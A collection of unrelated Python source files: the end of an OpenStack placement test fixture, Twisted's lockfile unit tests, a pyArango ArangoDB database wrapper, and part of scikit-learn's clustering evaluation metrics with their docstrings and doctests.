headers=headers,
raise_exc=False)
def _fake_post(self, *args, **kwargs):
(url, data) = args[1:]
# NOTE(sdague): using json= instead of data= sets the
# media type to application/json for us. Placement API is
# more sensitive to this than other APIs in the OpenStack
# ecosystem.
# TODO(sbauza): The current placement NoAuthMiddleware returns a 401
# in case a token is not provided. We should change that by creating
# a fake token so we could remove adding the header below.
headers = {'x-auth-token': self.token}
self._update_headers_with_version(headers, **kwargs)
return self._client.post(
url, json=data,
endpoint_override=self.endpoint,
headers=headers,
raise_exc=False)
def _fake_put(self, *args, **kwargs):
(url, data) = args[1:]
# NOTE(sdague): using json= instead of data= sets the
# media type to application/json for us. Placement API is
# more sensitive to this than other APIs in the OpenStack
# ecosystem.
# TODO(sbauza): The current placement NoAuthMiddleware returns a 401
# in case a token is not provided. We should change that by creating
# a fake token so we could remove adding the header below.
headers = {'x-auth-token': self.token}
self._update_headers_with_version(headers, **kwargs)
return self._client.put(
url, json=data,
endpoint_override=self.endpoint,
headers=headers,
raise_exc=False)
def _fake_delete(self, *args):
(url,) = args[1:]
# TODO(sbauza): The current placement NoAuthMiddleware returns a 401
# in case a token is not provided. We should change that by creating
# a fake token so we could remove adding the header below.
return self._client.delete(
url,
endpoint_override=self.endpoint,
headers={'x-auth-token': self.token},
raise_exc=False)
| |
# Copyright (c) 2005 Divmod, Inc.
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.python.lockfile}.
"""
import os, errno
from twisted.trial import unittest
from twisted.python import lockfile
from twisted.python.reflect import requireModule
from twisted.python.runtime import platform
skipKill = None
if platform.isWindows():
if(requireModule('win32api.OpenProcess') is None and
requireModule('pywintypes') is None
):
skipKill = ("On windows, lockfile.kill is not implemented in the "
"absence of win32api and/or pywintypes.")
class UtilTests(unittest.TestCase):
"""
Tests for the helper functions used to implement L{FilesystemLock}.
"""
def test_symlinkEEXIST(self):
"""
L{lockfile.symlink} raises L{OSError} with C{errno} set to L{EEXIST}
when an attempt is made to create a symlink which already exists.
"""
name = self.mktemp()
lockfile.symlink('foo', name)
exc = self.assertRaises(OSError, lockfile.symlink, 'foo', name)
self.assertEqual(exc.errno, errno.EEXIST)
def test_symlinkEIOWindows(self):
"""
L{lockfile.symlink} raises L{OSError} with C{errno} set to L{EIO} when
the underlying L{rename} call fails with L{EIO}.
Renaming a file on Windows may fail if the target of the rename is in
the process of being deleted (directory deletion appears not to be
atomic).
"""
name = self.mktemp()
def fakeRename(src, dst):
raise IOError(errno.EIO, None)
self.patch(lockfile, 'rename', fakeRename)
exc = self.assertRaises(IOError, lockfile.symlink, name, "foo")
self.assertEqual(exc.errno, errno.EIO)
if not platform.isWindows():
test_symlinkEIOWindows.skip = (
"special rename EIO handling only necessary and correct on "
"Windows.")
def test_readlinkENOENT(self):
"""
L{lockfile.readlink} raises L{OSError} with C{errno} set to L{ENOENT}
when an attempt is made to read a symlink which does not exist.
"""
name = self.mktemp()
exc = self.assertRaises(OSError, lockfile.readlink, name)
self.assertEqual(exc.errno, errno.ENOENT)
def test_readlinkEACCESWindows(self):
"""
L{lockfile.readlink} raises L{OSError} with C{errno} set to L{EACCES}
on Windows when the underlying file open attempt fails with C{EACCES}.
Opening a file on Windows may fail if the path is inside a directory
which is in the process of being deleted (directory deletion appears
not to be atomic).
"""
name = self.mktemp()
def fakeOpen(path, mode):
raise IOError(errno.EACCES, None)
self.patch(lockfile, '_open', fakeOpen)
exc = self.assertRaises(IOError, lockfile.readlink, name)
self.assertEqual(exc.errno, errno.EACCES)
if not platform.isWindows():
test_readlinkEACCESWindows.skip = (
"special readlink EACCES handling only necessary and correct on "
"Windows.")
def test_kill(self):
"""
L{lockfile.kill} returns without error if passed the PID of a
process which exists and signal C{0}.
"""
lockfile.kill(os.getpid(), 0)
test_kill.skip = skipKill
def test_killESRCH(self):
"""
L{lockfile.kill} raises L{OSError} with errno of L{ESRCH} if
passed a PID which does not correspond to any process.
"""
# Hopefully there is no process with PID 2 ** 31 - 1
exc = self.assertRaises(OSError, lockfile.kill, 2 ** 31 - 1, 0)
self.assertEqual(exc.errno, errno.ESRCH)
test_killESRCH.skip = skipKill
def test_noKillCall(self):
"""
Verify that when L{lockfile.kill} does end up as None (e.g. on Windows
without pywin32), it doesn't end up being called and raising a
L{TypeError}.
"""
self.patch(lockfile, "kill", None)
fl = lockfile.FilesystemLock(self.mktemp())
fl.lock()
self.assertFalse(fl.lock())
class LockingTests(unittest.TestCase):
def _symlinkErrorTest(self, errno):
def fakeSymlink(source, dest):
raise OSError(errno, None)
self.patch(lockfile, 'symlink', fakeSymlink)
lockf = self.mktemp()
lock = lockfile.FilesystemLock(lockf)
exc = self.assertRaises(OSError, lock.lock)
self.assertEqual(exc.errno, errno)
def test_symlinkError(self):
"""
An exception raised by C{symlink} other than C{EEXIST} is passed up to
the caller of L{FilesystemLock.lock}.
"""
self._symlinkErrorTest(errno.ENOSYS)
def test_symlinkErrorPOSIX(self):
"""
An L{OSError} raised by C{symlink} on a POSIX platform with an errno of
C{EACCES} or C{EIO} is passed to the caller of L{FilesystemLock.lock}.
On POSIX, unlike on Windows, these are unexpected errors which cannot
be handled by L{FilesystemLock}.
"""
self._symlinkErrorTest(errno.EACCES)
self._symlinkErrorTest(errno.EIO)
if platform.isWindows():
test_symlinkErrorPOSIX.skip = (
"POSIX-specific error propagation not expected on Windows.")
def test_cleanlyAcquire(self):
"""
If the lock has never been held, it can be acquired and the C{clean}
and C{locked} attributes are set to C{True}.
"""
lockf = self.mktemp()
lock = lockfile.FilesystemLock(lockf)
self.assertTrue(lock.lock())
self.assertTrue(lock.clean)
self.assertTrue(lock.locked)
def test_cleanlyRelease(self):
"""
If a lock is released cleanly, it can be re-acquired and the C{clean}
and C{locked} attributes are set to C{True}.
"""
lockf = self.mktemp()
lock = lockfile.FilesystemLock(lockf)
self.assertTrue(lock.lock())
lock.unlock()
self.assertFalse(lock.locked)
lock = lockfile.FilesystemLock(lockf)
self.assertTrue(lock.lock())
self.assertTrue(lock.clean)
self.assertTrue(lock.locked)
def test_cannotLockLocked(self):
"""
If a lock is currently locked, it cannot be locked again.
"""
lockf = self.mktemp()
firstLock = lockfile.FilesystemLock(lockf)
self.assertTrue(firstLock.lock())
secondLock = lockfile.FilesystemLock(lockf)
self.assertFalse(secondLock.lock())
self.assertFalse(secondLock.locked)
def test_uncleanlyAcquire(self):
"""
If a lock was held by a process which no longer exists, it can be
acquired, the C{clean} attribute is set to C{False}, and the
C{locked} attribute is set to C{True}.
"""
owner = 12345
def fakeKill(pid, signal):
if signal != 0:
raise OSError(errno.EPERM, None)
if pid == owner:
raise OSError(errno.ESRCH, None)
lockf = self.mktemp()
self.patch(lockfile, 'kill', fakeKill)
lockfile.symlink(str(owner), lockf)
lock = lockfile.FilesystemLock(lockf)
self.assertTrue(lock.lock())
self.assertFalse(lock.clean)
self.assertTrue(lock.locked)
self.assertEqual(lockfile.readlink(lockf), str(os.getpid()))
def test_lockReleasedBeforeCheck(self):
"""
If the lock is initially held but then released before it can be
examined to determine if the process which held it still exists, it is
acquired and the C{clean} and C{locked} attributes are set to C{True}.
"""
def fakeReadlink(name):
# Pretend to be another process releasing the lock.
lockfile.rmlink(lockf)
# Fall back to the real implementation of readlink.
readlinkPatch.restore()
return lockfile.readlink(name)
readlinkPatch = self.patch(lockfile, 'readlink', fakeReadlink)
def fakeKill(pid, signal):
if signal != 0:
raise OSError(errno.EPERM, None)
if pid == 43125:
raise OSError(errno.ESRCH, None)
self.patch(lockfile, 'kill', fakeKill)
lockf = self.mktemp()
lock = lockfile.FilesystemLock(lockf)
lockfile.symlink(str(43125), lockf)
self.assertTrue(lock.lock())
self.assertTrue(lock.clean)
self.assertTrue(lock.locked)
def test_lockReleasedDuringAcquireSymlink(self):
"""
If the lock is released while an attempt is made to acquire
it, the lock attempt fails and C{FilesystemLock.lock} returns
C{False}. This can happen on Windows when L{lockfile.symlink}
fails with L{IOError} of C{EIO} because another process is in
the middle of a call to L{os.rmdir} (implemented in terms of
RemoveDirectory) which is not atomic.
"""
def fakeSymlink(src, dst):
# While another process id doing os.rmdir which the Windows
# implementation of rmlink does, a rename call will fail with EIO.
raise OSError(errno.EIO, None)
self.patch(lockfile, 'symlink', fakeSymlink)
lockf = self.mktemp()
lock = lockfile.FilesystemLock(lockf)
self.assertFalse(lock.lock())
self.assertFalse(lock.locked)
if not platform.isWindows():
test_lockReleasedDuringAcquireSymlink.skip = (
"special rename EIO handling only necessary and correct on "
"Windows.")
def test_lockReleasedDuringAcquireReadlink(self):
"""
If the lock is initially held but is released while an attempt
is made to acquire it, the lock attempt fails and
L{FilesystemLock.lock} returns C{False}.
"""
def fakeReadlink(name):
# While another process is doing os.rmdir which the
# Windows implementation of rmlink does, a readlink call
# will fail with EACCES.
raise IOError(errno.EACCES, None)
self.patch(lockfile, 'readlink', fakeReadlink)
lockf = self.mktemp()
lock = lockfile.FilesystemLock(lockf)
lockfile.symlink(str(43125), lockf)
self.assertFalse(lock.lock())
self.assertFalse(lock.locked)
if not platform.isWindows():
test_lockReleasedDuringAcquireReadlink.skip = (
"special readlink EACCES handling only necessary and correct on "
"Windows.")
def _readlinkErrorTest(self, exceptionType, errno):
def fakeReadlink(name):
raise exceptionType(errno, None)
self.patch(lockfile, 'readlink', fakeReadlink)
lockf = self.mktemp()
# Make it appear locked so it has to use readlink
lockfile.symlink(str(43125), lockf)
lock = lockfile.FilesystemLock(lockf)
exc = self.assertRaises(exceptionType, lock.lock)
self.assertEqual(exc.errno, errno)
self.assertFalse(lock.locked)
def test_readlinkError(self):
"""
An exception raised by C{readlink} other than C{ENOENT} is passed up to
the caller of L{FilesystemLock.lock}.
"""
self._readlinkErrorTest(OSError, errno.ENOSYS)
self._readlinkErrorTest(IOError, errno.ENOSYS)
def test_readlinkErrorPOSIX(self):
"""
Any L{IOError} raised by C{readlink} on a POSIX platform passed to the
caller of L{FilesystemLock.lock}.
On POSIX, unlike on Windows, these are unexpected errors which cannot
be handled by L{FilesystemLock}.
"""
self._readlinkErrorTest(IOError, errno.ENOSYS)
self._readlinkErrorTest(IOError, errno.EACCES)
if platform.isWindows():
test_readlinkErrorPOSIX.skip = (
"POSIX-specific error propagation not expected on Windows.")
def test_lockCleanedUpConcurrently(self):
"""
If a second process cleans up the lock after a first one checks the
lock and finds that no process is holding it, the first process does
not fail when it tries to clean up the lock.
"""
def fakeRmlink(name):
rmlinkPatch.restore()
# Pretend to be another process cleaning up the lock.
lockfile.rmlink(lockf)
# Fall back to the real implementation of rmlink.
return lockfile.rmlink(name)
rmlinkPatch = self.patch(lockfile, 'rmlink', fakeRmlink)
def fakeKill(pid, signal):
if signal != 0:
raise OSError(errno.EPERM, None)
if pid == 43125:
raise OSError(errno.ESRCH, None)
self.patch(lockfile, 'kill', fakeKill)
lockf = self.mktemp()
lock = lockfile.FilesystemLock(lockf)
lockfile.symlink(str(43125), lockf)
self.assertTrue(lock.lock())
self.assertTrue(lock.clean)
self.assertTrue(lock.locked)
def test_rmlinkError(self):
"""
An exception raised by L{rmlink} other than C{ENOENT} is passed up
to the caller of L{FilesystemLock.lock}.
"""
def fakeRmlink(name):
raise OSError(errno.ENOSYS, None)
self.patch(lockfile, 'rmlink', fakeRmlink)
def fakeKill(pid, signal):
if signal != 0:
raise OSError(errno.EPERM, None)
if pid == 43125:
raise OSError(errno.ESRCH, None)
self.patch(lockfile, 'kill', fakeKill)
lockf = self.mktemp()
# Make it appear locked so it has to use readlink
lockfile.symlink(str(43125), lockf)
lock = lockfile.FilesystemLock(lockf)
exc = self.assertRaises(OSError, lock.lock)
self.assertEqual(exc.errno, errno.ENOSYS)
self.assertFalse(lock.locked)
def test_killError(self):
"""
If L{kill} raises an exception other than L{OSError} with errno set to
C{ESRCH}, the exception is passed up to the caller of
L{FilesystemLock.lock}.
"""
def fakeKill(pid, signal):
raise OSError(errno.EPERM, None)
self.patch(lockfile, 'kill', fakeKill)
lockf = self.mktemp()
# Make it appear locked so it has to use readlink
lockfile.symlink(str(43125), lockf)
lock = lockfile.FilesystemLock(lockf)
exc = self.assertRaises(OSError, lock.lock)
self.assertEqual(exc.errno, errno.EPERM)
self.assertFalse(lock.locked)
def test_unlockOther(self):
"""
L{FilesystemLock.unlock} raises L{ValueError} if called for a lock
which is held by a different process.
"""
lockf = self.mktemp()
lockfile.symlink(str(os.getpid() + 1), lockf)
lock = lockfile.FilesystemLock(lockf)
self.assertRaises(ValueError, lock.unlock)
def test_isLocked(self):
"""
L{isLocked} returns C{True} if the named lock is currently locked,
C{False} otherwise.
"""
lockf = self.mktemp()
self.assertFalse(lockfile.isLocked(lockf))
lock = lockfile.FilesystemLock(lockf)
self.assertTrue(lock.lock())
self.assertTrue(lockfile.isLocked(lockf))
lock.unlock()
self.assertFalse(lockfile.isLocked(lockf))
| |
import json
import types
import collection as COL
import graph as GR
from document import Document
from graph import Graph
from query import AQLQuery
from theExceptions import CreationError, UpdateError
class Database(object) :
def __init__(self, connection, name) :
"meant to be called by the connection only"
self.name = name
self.connection = connection
self.collections = {}
self.URL = '%s/_db/%s/_api' % (self.connection.arangoURL, self.name)
self.collectionsURL = '%s/collection' % (self.URL)
self.cursorsURL = '%s/cursor' % (self.URL)
self.explainURL = '%s/explain' % (self.URL)
self.graphsURL = "%s/gharial" % self.URL
self.collections = {}
self.graphs = {}
self.reload()
def reloadCollections(self) :
"reloads the collection list."
r = self.connection.session.get(self.collectionsURL)
data = r.json()
if r.status_code == 200 :
self.collections = {}
for colData in data["collections"] :
colName = colData['name']
if colData['isSystem'] :
colObj = COL.SystemCollection(self, colData)
else :
try :
colClass = COL.getCollectionClass(colName)
colObj = colClass(self, colData)
except KeyError :
colObj = COL.GenericCollection(self, colData)
self.collections[colName] = colObj
else :
raise updateError(data["errorMessage"], data)
def reloadGraphs(self) :
"reloads the graph list"
r = self.connection.session.get(self.graphsURL)
data = r.json()
if r.status_code == 200 :
self.graphs = {}
for graphData in data["graphs"] :
try :
self.graphs[graphData["_key"]] = GR.getGraphClass(graphData["_key"])(self, graphData)
except KeyError :
self.graphs[graphData["_key"]] = Graph(self, graphData)
else :
raise UpdateError(data["errorMessage"], data)
def reload(self) :
"reloads collections and graphs"
self.reloadCollections()
self.reloadGraphs()
def createCollection(self, className = 'GenericCollection', waitForSync = False, **colArgs) :
"""Creeats a collection and returns it.
ClassName the name of a class inheriting from Collection or Egdes. Use colArgs to put things such as 'isVolatile = True' (see ArangoDB's doc
for a full list of possible arugments)."""
if className != 'GenericCollection' :
colArgs['name'] = className
else :
if 'name' not in colArgs :
raise ValueError("a 'name' argument mush be supplied if you want to create a generic collection")
colClass = COL.getCollectionClass(className)
if colArgs['name'] in self.collections :
raise CreationError("Database %s already has a collection named %s" % (self.name, colArgs['name']) )
if issubclass(colClass, COL.Edges) :
colArgs["type"] = COL.COLLECTION_EDGE_TYPE
else :
colArgs["type"] = COL.COLLECTION_DOCUMENT_TYPE
colArgs["waitForSync"] = waitForSync
payload = json.dumps(colArgs)
r = self.connection.session.post(self.collectionsURL, data = payload)
data = r.json()
if r.status_code == 200 and not data["error"] :
col = colClass(self, data)
self.collections[col.name] = col
return self.collections[col.name]
else :
raise CreationError(data["errorMessage"], data)
def fetchDocument(self, _id) :
"fetchs a document using it's _id"
sid = _id.split("/")
return self[sid[0]][sid[1]]
def createGraph(self, name, createCollections = True) :
"""Creates a graph and returns it. 'name' must be the name of a class inheriting from Graph.
You can decide weither or not you want non existing collections to be created by setting the value of 'createCollections'.
If the value if 'false' checks will be performed to make sure that every collection mentionned in the edges definition exist. Raises a ValueError in case of
a non-existing collection."""
def _checkCollectionList(lst) :
for colName in lst :
if not COL.isCollection(colName) :
raise ValueError("'%s' is not a defined Collection" % colName)
graphClass = GR.getGraphClass(name)
ed = []
for e in graphClass._edgeDefinitions :
if not createCollections :
if not COL.isEdgeCollection(e.edgesCollection) :
raise ValueError("'%s' is not a defined Edge Collection" % e.edgesCollection)
_checkCollectionList(e.fromCollections)
_checkCollectionList(e.toCollections)
ed.append(e.toJson())
if not createCollections :
_checkCollectionList(graphClass._orphanedCollections)
payload = {
"name": name,
"edgeDefinitions": ed,
"orphanCollections": graphClass._orphanedCollections
}
payload = json.dumps(payload)
r = self.connection.session.post(self.graphsURL, data = payload)
data = r.json()
if r.status_code == 201 :
self.graphs[name] = graphClass(self, data["graph"])
else :
raise CreationError(data["errorMessage"], data)
return self.graphs[name]
# def _checkGraphCollections(self, edgeDefinitions, orphanCollections) :
# for ed in edgeDefinitions :
# checkList(ed["from"])
# checkList(ed["to"])
# checkList(orphanCollections)
def hasCollection(self, name) :
"""returns true if the databse has a collection by the name of 'name'"""
return name in self.collections
def hasGraph(name):
"""returns true if the databse has a graph by the name of 'name'"""
return name in self.graphs
def AQLQuery(self, query, batchSize = 0, rawResults = False, bindVars = {}, options = {}, count = False, fullCount = False) :
"Set rawResults = True if you want the query to return dictionnaries instead of Document objects"
return AQLQuery(self, query, rawResults = rawResults, batchSize = batchSize, bindVars = bindVars, options = options, count = count, fullCount = fullCount)
def explainAQLQuery(self, query, allPlans = False) :
"""Returns an explanation of the query. Setting allPlans to True will result in ArangoDB returning all possible plans. False returns only the optimal plan"""
payload = {'query' : query, 'allPlans' : allPlans}
request = self.connection.session.post(self.explainURL, data = json.dumps(payload))
return request.json()
def validateAQLQuery(self, query, bindVars = {}, options = {}) :
"returns the server answer is the query is valid. Raises an AQLQueryError if not"
payload = {'query' : query, 'bindVars' : bindVars, 'options' : options}
r = self.connection.session.post(self.cursorsURL, data = json.dumps(payload))
data = r.json()
if r.status_code == 201 and not data["error"] :
return data
else :
raise AQLQueryError(data["errorMessage"], query, data)
def __repr__(self) :
return "ArangoDB database: %s" % self.name
def __getitem__(self, collectionName) :
"""use database[collectionName] to get a collection from the database"""
try :
return self.collections[collectionName]
except KeyError :
self.reload()
try :
return self.collections[collectionName]
except KeyError :
raise KeyError("Can't find any collection named : %s" % collectionName)
class DBHandle(Database) :
"As the loading of a DB triggers the loading of collections and graphs within. Only handles are loaded first. The full database are loaded on demand."
def __init__(self, connection, name) :
self.connection = connection
self.name = name
def __getattr__(self, k) :
name = Database.__getattribute__(self, 'name')
connection = Database.__getattribute__(self, 'connection')
Database.__init__(self, connection, name)
return Database.__getattribute__(self, k)
| |
"""Utilities to evaluate the clustering performance of models
Functions named as *_score return a scalar value to maximize: the higher the
better.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>
# Wei LI <kuantkid@gmail.com>
# Diego Molla <dmolla-aliod@gmail.com>
# License: BSD 3 clause
from math import log
import numpy as np
from scipy.misc import comb
from scipy.sparse import coo_matrix
from .expected_mutual_info_fast import expected_mutual_information
from ...utils.fixes import bincount
def comb2(n):
# the exact version is faster for k == 2: use it by default globally in
# this module instead of the float approximate variant
return comb(n, 2, exact=1)
def check_clusterings(labels_true, labels_pred):
"""Check that the two clusterings matching 1D integer arrays"""
labels_true = np.asarray(labels_true)
labels_pred = np.asarray(labels_pred)
# input checks
if labels_true.ndim != 1:
raise ValueError(
"labels_true must be 1D: shape is %r" % (labels_true.shape,))
if labels_pred.ndim != 1:
raise ValueError(
"labels_pred must be 1D: shape is %r" % (labels_pred.shape,))
if labels_true.shape != labels_pred.shape:
raise ValueError(
"labels_true and labels_pred must have same size, got %d and %d"
% (labels_true.shape[0], labels_pred.shape[0]))
return labels_true, labels_pred
def contingency_matrix(labels_true, labels_pred, eps=None, max_n_classes=5000):
"""Build a contingency matrix describing the relationship between labels.
Parameters
----------
labels_true : int array, shape = [n_samples]
Ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
Cluster labels to evaluate
eps: None or float
If a float, that value is added to all values in the contingency
matrix. This helps to stop NaN propagation.
If ``None``, nothing is adjusted.
max_n_classes : int, optional (default=5000)
Maximal number of classeses handled for contingency_matrix.
This help to avoid Memory error with regression target
for mutual_information.
Returns
-------
contingency: array, shape=[n_classes_true, n_classes_pred]
Matrix :math:`C` such that :math:`C_{i, j}` is the number of samples in
true class :math:`i` and in predicted class :math:`j`. If
``eps is None``, the dtype of this array will be integer. If ``eps`` is
given, the dtype will be float.
"""
classes, class_idx = np.unique(labels_true, return_inverse=True)
clusters, cluster_idx = np.unique(labels_pred, return_inverse=True)
n_classes = classes.shape[0]
n_clusters = clusters.shape[0]
if n_classes > max_n_classes:
raise ValueError("Too many classes for a clustering metric. If you "
"want to increase the limit, pass parameter "
"max_n_classes to the scoring function")
if n_clusters > max_n_classes:
raise ValueError("Too many clusters for a clustering metric. If you "
"want to increase the limit, pass parameter "
"max_n_classes to the scoring function")
# Using coo_matrix to accelerate simple histogram calculation,
# i.e. bins are consecutive integers
# Currently, coo_matrix is faster than histogram2d for simple cases
contingency = coo_matrix((np.ones(class_idx.shape[0]),
(class_idx, cluster_idx)),
shape=(n_classes, n_clusters),
dtype=np.int).toarray()
if eps is not None:
# don't use += as contingency is integer
contingency = contingency + eps
return contingency
# clustering measures
def adjusted_rand_score(labels_true, labels_pred, max_n_classes=5000):
"""Rand index adjusted for chance
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_score(a, b) == adjusted_rand_score(b, a)
Read more in the :ref:`User Guide <adjusted_rand_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
Ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
Cluster labels to evaluate
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the adjusted_rand_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
ari : float
Similarity score between -1.0 and 1.0. Random labelings have an ARI
close to 0.0. 1.0 stands for perfect match.
Examples
--------
Perfectly maching labelings have a score of 1 even
>>> from sklearn.metrics.cluster import adjusted_rand_score
>>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> adjusted_rand_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Labelings that assign all classes members to the same clusters
are complete be not always pure, hence penalized::
>>> adjusted_rand_score([0, 0, 1, 2], [0, 0, 1, 1]) # doctest: +ELLIPSIS
0.57...
ARI is symmetric, so labelings that have pure clusters with members
coming from the same classes but unnecessary splits are penalized::
>>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 2]) # doctest: +ELLIPSIS
0.57...
If classes members are completely split across different clusters, the
assignment is totally incomplete, hence the ARI is very low::
>>> adjusted_rand_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
References
----------
.. [Hubert1985] `L. Hubert and P. Arabie, Comparing Partitions,
Journal of Classification 1985`
http://www.springerlink.com/content/x64124718341j1j0/
.. [wk] http://en.wikipedia.org/wiki/Rand_index#Adjusted_Rand_index
See also
--------
adjusted_mutual_info_score: Adjusted Mutual Information
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
n_samples = labels_true.shape[0]
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split;
# or trivial clustering where each document is assigned a unique cluster.
# These are perfect matches hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1
or classes.shape[0] == clusters.shape[0] == 0
or classes.shape[0] == clusters.shape[0] == len(labels_true)):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred,
max_n_classes=max_n_classes)
# Compute the ARI using the contingency data
sum_comb_c = sum(comb2(n_c) for n_c in contingency.sum(axis=1))
sum_comb_k = sum(comb2(n_k) for n_k in contingency.sum(axis=0))
sum_comb = sum(comb2(n_ij) for n_ij in contingency.flatten())
prod_comb = (sum_comb_c * sum_comb_k) / float(comb(n_samples, 2))
mean_comb = (sum_comb_k + sum_comb_c) / 2.
return ((sum_comb - prod_comb) / (mean_comb - prod_comb))
def homogeneity_completeness_v_measure(labels_true, labels_pred,
max_n_classes=5000):
"""Compute the homogeneity and completeness and V-Measure scores at once
Those metrics are based on normalized conditional entropy measures of
the clustering labeling to evaluate given the knowledge of a Ground
Truth class labels of the same samples.
A clustering result satisfies homogeneity if all of its clusters
contain only data points which are members of a single class.
A clustering result satisfies completeness if all the data points
that are members of a given class are elements of the same cluster.
Both scores have positive values between 0.0 and 1.0, larger values
being desirable.
Those 3 metrics are independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score values in any way.
V-Measure is furthermore symmetric: swapping ``labels_true`` and
``label_pred`` will give the same score. This does not hold for
homogeneity and completeness.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the adjusted_rand_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
homogeneity: float
score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling
completeness: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
v_measure: float
harmonic mean of the first two
See also
--------
homogeneity_score
completeness_score
v_measure_score
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
if len(labels_true) == 0:
return 1.0, 1.0, 1.0
entropy_C = entropy(labels_true)
entropy_K = entropy(labels_pred)
MI = mutual_info_score(labels_true, labels_pred,
max_n_classes=max_n_classes)
homogeneity = MI / (entropy_C) if entropy_C else 1.0
completeness = MI / (entropy_K) if entropy_K else 1.0
if homogeneity + completeness == 0.0:
v_measure_score = 0.0
else:
v_measure_score = (2.0 * homogeneity * completeness
/ (homogeneity + completeness))
return homogeneity, completeness, v_measure_score
def homogeneity_score(labels_true, labels_pred, max_n_classes=5000):
"""Homogeneity metric of a cluster labeling given a ground truth
A clustering result satisfies homogeneity if all of its clusters
contain only data points which are members of a single class.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is not symmetric: switching ``label_true`` with ``label_pred``
will return the :func:`completeness_score` which will be different in
general.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the adjusted_rand_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
homogeneity: float
score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<http://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
completeness_score
v_measure_score
Examples
--------
Perfect labelings are homogeneous::
>>> from sklearn.metrics.cluster import homogeneity_score
>>> homogeneity_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Non-perfect labelings that further split classes into more clusters can be
perfectly homogeneous::
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 1, 2]))
... # doctest: +ELLIPSIS
1.0...
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 2, 3]))
... # doctest: +ELLIPSIS
1.0...
Clusters that include samples from different classes do not make for an
homogeneous labeling::
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 0, 1]))
... # doctest: +ELLIPSIS
0.0...
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 0, 0]))
... # doctest: +ELLIPSIS
0.0...
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred,
max_n_classes)[0]
def completeness_score(labels_true, labels_pred, max_n_classes=5000):
"""Completeness metric of a cluster labeling given a ground truth
A clustering result satisfies completeness if all the data points
that are members of a given class are elements of the same cluster.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is not symmetric: switching ``label_true`` with ``label_pred``
will return the :func:`homogeneity_score` which will be different in
general.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the adjusted_rand_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
completeness: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<http://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
homogeneity_score
v_measure_score
Examples
--------
Perfect labelings are complete::
>>> from sklearn.metrics.cluster import completeness_score
>>> completeness_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Non-perfect labelings that assign all classes members to the same clusters
are still complete::
>>> print(completeness_score([0, 0, 1, 1], [0, 0, 0, 0]))
1.0
>>> print(completeness_score([0, 1, 2, 3], [0, 0, 1, 1]))
1.0
If classes members are split across different clusters, the
assignment cannot be complete::
>>> print(completeness_score([0, 0, 1, 1], [0, 1, 0, 1]))
0.0
>>> print(completeness_score([0, 0, 0, 0], [0, 1, 2, 3]))
0.0
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred,
max_n_classes)[1]
def v_measure_score(labels_true, labels_pred, max_n_classes=5000):
"""V-measure cluster labeling given a ground truth.
This score is identical to :func:`normalized_mutual_info_score`.
The V-measure is the harmonic mean between homogeneity and completeness::
v = 2 * (homogeneity * completeness) / (homogeneity + completeness)
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
